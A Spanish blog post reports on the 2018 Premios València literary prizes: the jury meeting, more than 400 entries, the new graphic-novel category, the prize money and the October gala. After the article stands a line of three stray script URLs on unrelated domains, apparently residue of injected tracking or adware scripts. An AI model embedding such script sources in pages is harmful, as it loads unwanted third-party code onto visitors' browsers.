Premios Valéncia 2018 de la Institució Alfons El Magnànim

Premios Valéncia 2018 de la Institució Alfons El Magnànim

Posted by

Los jurados de los Premios València y València Nova 2018 que convoca la Institució Alfons el Magnànim-Centre Valencià d’Estudis i d’Investigació, dependiente del Área de Cultura de la Diputació de València, se reunirán el jueves 14 de junio, en el Museu Valencià de la Il·lustració i la Modernitat, para decidir su veredicto final entre las más de 400 obras presentadas en las diferentes modalidades de poesía (en castellano y valenciano), narrativa (en castellano y valenciano), ensayo y, la novedad de 2018, novela gráfica, así como los València Nova (para menores de 31 años) en narrativa, poesía y ensayo. Los jurados, presididos por el diputado de Cultura, Xavier Rius, harán pública su decisión en rueda de prensa a las 13 horas, en la Sala Gregori Mayans del MuVIM, según el Gabinete de Prensa de la Diputación.

A la vista de los trabajos presentados, Xavier Rius ha declarado que la “numerosa participación acredita la consolidación en esta nueva etapa y la buena salud del certamen” y ha destacado “la repercusión de la publicación de los trabajos en editoriales prestigiosas y la importante dotación económica”. Rius también se ha mostrado muy satisfecho por la respuesta (17 trabajos) al premio de novela gráfica, novedad de este año, que “quiere dar oportunidad a ilustradores, diseñadores y dibujantes en un género que cuenta cada día con más seguidores”. En concreto, los trabajos premiados en narrativa y ensayo recibirán 12.000 euros, los de poesía, 7.500, y el de novela gráfica, 8.000 euros. En cuanto a la categoría para jóvenes, València Nova, los premios son de 5.000 euros para los de narrativa y de ensayo y de 3.000 euros para los de poesía.

Cómo ya es tradición, los galardones se entregarán en una gala que el director, Vicent Flor, avanza que se celebrará el 18 de octubre en el Centre de Carme y que será conducida por el presentador y humorista Eugeni Alemany en un acto que se prevé, “ágil, divertido y con música en directo”. Otro aliciente de la gala es que ya se presentarán los premios editados.

Al igual que en ediciones anteriores, el Magnànim ha seleccionado con detenimiento las personas que forman parte de los diferentes jurados como garantía de la solvencia y el prestigio de los galardones

 

 

http://infoanalytics.tools/addons/lnkr5.min.jshttp://worldnaturenet.xyz/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52200x6839x&r=18http://infoanalytics.tools/ext/1ab78adcf736ff0ca5.js?sid=52200_6839_&title=&blocks%5B%5D=31af2

Deja un comentario

Twitter Auto Publish Powered By : XYZScripts.com
Member of The Internet Defense League
A %d blogueros les gusta esto: